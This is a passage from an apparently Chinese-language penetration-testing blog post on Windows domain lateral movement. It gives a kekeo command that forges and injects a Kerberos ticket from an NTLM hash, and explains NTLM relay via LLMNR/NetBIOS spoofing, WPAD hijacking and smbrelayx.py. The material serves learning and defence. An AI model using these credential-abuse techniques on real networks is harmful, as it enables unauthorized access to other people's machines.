<h3 id="kekeo"><a href="#kekeo" class="headerlink" title="kekeo"></a>kekeo</h3><p>kekeo 需要使用<code>域名、用户名、NTLM Hash </code>三者配合生成票据，再将票据导入，从而直接连接远程计算机。</p>
<div class="highlight-wrap" data-rel="Javascript"><figure class="iseeu highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">kekeo.<span class="property">exe</span> <span class="string">&quot;tgt::ask /user:administrator /domain:b1ink.club /ntlm:hash&quot;</span></span><br><span class="line"><span class="attr">kerberos</span>::ptt 票据</span><br></pre></td></tr></table></figure></div>

<h2 id="NTLM-Relay攻击"><a href="#NTLM-Relay攻击" class="headerlink" title="NTLM Relay攻击"></a>NTLM Relay攻击</h2><p>我们要将截获的Net-NTLM Hash重放来进行攻击，从而实现对其他机器的控制</p>
<p>Net-NTLM Hash 是基于用户密码的NTLM Hash计算出来的，用于在网络环境下 NTLM 认证的 hash。为了重放这个Net-NTLMhash，首先我们要做的就是获取这个Net-NTLMhash。</p>
<p><strong>利用LLMNR和NetBIOS欺骗获得Net-NTLMHash</strong></p>
<p><strong>利用WPAD劫持获得Net-NTLMHash</strong></p>
<p>攻击者伪造一个恶意的SMB服务器，当内网中有机器Client1访问这个攻击者精心构造好的SMB服务器时， smbrelayx.py 脚本将抓到  Client1 的 Net-NTLM Hash ，然后 smbrelayx.py 用抓取到的 Client1 的 Net-NTLM Hash  重放给 Client2 。</p>
<h2 id="NTLM-Relay"><a href="#NTLM-Relay" class="headerlink" title="NTLM-Relay"></a>NTLM-Relay</h2><h3 id="NTLM相关"><a href="#NTLM相关" class="headerlink" title="NTLM相关"></a>NTLM相关</h3><p><strong>1.用处</strong></p>
<p>NTLM是一种windows的验证用户身份的一种机制，多存在于工作组环境下。可以与smb、http、ldap等协议嵌套使用，攻击者有可能利用这几种协议来进行NTLM-relay攻击。<br><strong>2.认证流程</strong></p>
<pre><code>客户端向要访问的机器发送用户名，这个被访问的机器称为服务端。
服务端向客户端发送一个challenge。
客户收到challenge后用自己的 NTML hash对其进行加密生成response ， 并将response发送给服务端
服务端将response、challenge、客户端的用户名一起发送给域控。
域控将用户名对应的hash用challenge进行加密后与response进行对比，如果一样那么认证成功。
</code></pre>
<h3 id="Net-NTLM-hash"><a href="#Net-NTLM-hash" class="headerlink" title="Net-NTLM hash"></a>Net-NTLM hash</h3><p>这个是指的是ntlm认证第三阶段的时候客户端发送给服务器的用自己的hash加密challenge后的那段密文也就是response。</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8"><span class="toc-number">1.</span> <span class="toc-text">横向移动</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E5%9F%9F%E5%86%85%E5%8D%95%E6%9C%BA%E5%AF%86%E7%A0%81%E4%B8%8EHash"><span class="toc-number">1.1.</span> <span class="toc-text">获取域内单机密码与Hash</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8Windows%E8%BF%9C%E7%A8%8B%E8%BF%9E%E6%8E%A5%E5%91%BD%E4%BB%A4%E8%BF%9B%E8%A1%8C%E6%A8%AA%E5%90%91%E6%B8%97%E9%80%8F"><span class="toc-number">1.2.</span> <span class="toc-text">利用Windows远程连接命令进行横向渗透</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%BB%BA%E7%AB%8BIPC%E8%BF%9E%E6%8E%A5"><span class="toc-number">1.2.1.</span> <span class="toc-text">建立IPC连接</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%BB%BA%E7%AB%8B%E5%85%B6%E4%BB%96%E5%85%B1%E4%BA%AB%E8%BF%9E%E6%8E%A5"><span class="toc-number">1.2.2.</span> <span class="toc-text">建立其他共享连接</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8Windows%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1%E8%BF%9B%E8%A1%8C%E6%A8%AA%E5%90%91%E6%B8%97%E9%80%8F"><span class="toc-number">1.3.</span> <span class="toc-text">利用Windows计划任务进行横向渗透</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#at%E5%91%BD%E4%BB%A4"><span class="toc-number">1.3.1.</span> <span class="toc-text">at命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#schtasks-%E5%91%BD%E4%BB%A4"><span class="toc-number">1.3.2.</span> <span class="toc-text">schtasks 命令</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%9B%E5%BB%BAWindows%E6%9C%8D%E5%8A%A1%E6%9D%A5%E8%BF%9B%E8%A1%8C%E6%A8%AA%E5%90%91%E6%B8%97%E9%80%8F"><span class="toc-number">1.4.</span> <span class="toc-text">创建Windows服务来进行横向渗透</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#sc%E5%91%BD%E4%BB%A4"><span class="toc-number">1.4.1.</span> <span class="toc-text">sc命令</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8PsExec%E5%B7%A5%E5%85%B7%E8%BF%9B%E8%A1%8C%E6%A8%AA%E5%90%91%E6%B8%97%E9%80%8F"><span class="toc-number">1.5.</span> <span class="toc-text">利用PsExec工具进行横向渗透</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#windows%E4%B8%8B%E7%9A%84psexec"><span class="toc-number">1.5.1.</span> <span class="toc-text">windows下的psexec</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#metasploit%E7%9A%84PsExec%E6%A8%A1%E5%9D%97"><span class="toc-number">1.5.2.</span> <span class="toc-text">metasploit的PsExec模块</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8Smbexec%E5%B7%A5%E5%85%B7%E8%BF%9B%E8%A1%8C%E6%A8%AA%E5%90%91%E6%B8%97%E9%80%8F"><span class="toc-number">1.6.</span> <span class="toc-text">利用Smbexec工具进行横向渗透</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8WMI%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8"><span class="toc-number">1.7.</span> <span class="toc-text">利用WMI横向移动</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#wmic"><span class="toc-number">1.7.1.</span> <span class="toc-text">wmic</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#wmiexec"><span class="toc-number">1.7.2.</span> <span class="toc-text">wmiexec</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#DCOM"><span class="toc-number">1.8.</span> <span class="toc-text">DCOM</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8-DCOM-%E5%9C%A8%E6%9C%AC%E5%9C%B0%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4"><span class="toc-number">1.8.1.</span> <span class="toc-text">使用 DCOM 在本地执行命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8-DCOM-%E5%9C%A8%E8%BF%9C%E7%A8%8B%E4%B8%BB%E6%9C%BA%E4%B8%8A%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4"><span class="toc-number">1.8.2.</span> <span class="toc-text">使用 DCOM 在远程主机上执行命令</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%B0%83%E7%94%A8-MMC20-Application-%E8%BF%9C%E7%A8%8B%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4"><span class="toc-number">1.8.2.1.</span> <span class="toc-text">调用 MMC20.Application 远程执行命令</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%B0%83%E7%94%A8-ShellWindows-%E8%BF%9C%E7%A8%8B%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4"><span class="toc-number">1.8.2.2.</span> <span class="toc-text">调用 ShellWindows 远程执行命令</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%B0%83%E7%94%A8-Excel-Application-%E8%BF%9C%E7%A8%8B%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4"><span class="toc-number">1.8.2.3.</span> <span class="toc-text">调用 Excel.Application 远程执行命令</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%B0%83%E7%94%A8-ShellBrowserWindow-%E8%BF%9C%E7%A8%8B%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4"><span class="toc-number">1.8.2.4.</span> <span class="toc-text">调用 ShellBrowserWindow 远程执行命令</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%B0%83%E7%94%A8-Visio-Application-%E8%BF%9C%E7%A8%8B%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4"><span class="toc-number">1.8.2.5.</span> <span class="toc-text">调用 Visio.Application 远程执行命令</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%B0%83%E7%94%A8-Outlook-Application-%E8%BF%9C%E7%A8%8B%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4"><span class="toc-number">1.8.2.6.</span> <span class="toc-text">调用 Outlook.Application 远程执行命令</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#dcomexec"><span class="toc-number">1.8.3.</span> <span class="toc-text">dcomexec</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Hash%E4%BC%A0%E9%80%92%E6%94%BB%E5%87%BB"><span class="toc-number">1.9.</span> <span class="toc-text">Hash传递攻击</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#SMB%E6%B8%97%E9%80%8F%E8%87%B3Hash%E4%BC%A0%E9%80%92%E6%94%BB%E5%87%BB%E7%9A%84%E5%8E%9F%E7%90%86"><span class="toc-number">1.9.1.</span> <span class="toc-text">SMB渗透至Hash传递攻击的原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#mimikatz"><span class="toc-number">1.9.2.</span> <span class="toc-text">mimikatz</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#MSF"><span class="toc-number">1.9.3.</span> <span class="toc-text">MSF</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#wmic-1"><span class="toc-number">1.9.4.</span> <span class="toc-text">wmic</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%A5%A8%E6%8D%AE%E4%BC%A0%E9%80%92%E6%94%BB%E5%87%BBPTT"><span class="toc-number">1.10.</span> <span class="toc-text">票据传递攻击PTT</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#MS14-068"><span class="toc-number">1.10.1.</span> <span class="toc-text">MS14-068</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#mimikatz%E5%AF%BC%E5%87%BA%E7%A5%A8%E6%8D%AE"><span class="toc-number">1.10.2.</span> <span class="toc-text">mimikatz导出票据</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#kekeo"><span class="toc-number">1.10.3.</span> <span class="toc-text">kekeo</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#NTLM-Relay%E6%94%BB%E5%87%BB"><span class="toc-number">1.11.</span> <span class="toc-text">NTLM Relay攻击</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#NTLM-Relay"><span class="toc-number">1.12.</span> <span class="toc-text">NTLM-Relay</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#NTLM%E7%9B%B8%E5%85%B3"><span class="toc-number">1.12.1.</span> <span class="toc-text">NTLM相关</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Net-NTLM-hash"><span class="toc-number">1.12.2.</span> <span class="toc-text">Net-NTLM hash</span></a></li></ol></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2022/06/06/%E7%AC%AC%E4%B9%9D%E5%A4%A9_b1ink_%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2022/06/06/%E7%AC%AC%E4%B9%9D%E5%A4%A9_b1ink_%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/&text="><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2022/06/06/%E7%AC%AC%E4%B9%9D%E5%A4%A9_b1ink_%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/&title="><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2022/06/06/%E7%AC%AC%E4%B9%9D%E5%A4%A9_b1ink_%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/&is_video=false&description="><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=&body=Check out this article: http://example.com/2022/06/06/%E7%AC%AC%E4%B9%9D%E5%A4%A9_b1ink_%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2022/06/06/%E7%AC%AC%E4%B9%9D%E5%A4%A9_b1ink_%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/&title="><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2022/06/06/%E7%AC%AC%E4%B9%9D%E5%A4%A9_b1ink_%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/&title="><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2022/06/06/%E7%AC%AC%E4%B9%9D%E5%A4%A9_b1ink_%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/&title="><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2022/06/06/%E7%AC%AC%E4%B9%9D%E5%A4%A9_b1ink_%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/&title="><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2022/06/06/%E7%AC%AC%E4%B9%9D%E5%A4%A9_b1ink_%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/&name=&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2022/06/06/%E7%AC%AC%E4%B9%9D%E5%A4%A9_b1ink_%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/&t="><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
      <div class="footer-left">
        Copyright &copy;
        
        
        2020-2022
        B1ink
      </div>
      <div class="footer-right">
        <nav>
          
          <ul>
            
              <!-- 不蒜子统计 -->
              <span id="busuanzi_container_site_pv">
                  本站总访问量<span id="busuanzi_value_site_pv"></span>次
              </span>
            <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            
          </ul>
        </nav>
      </div>
</footer>
    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
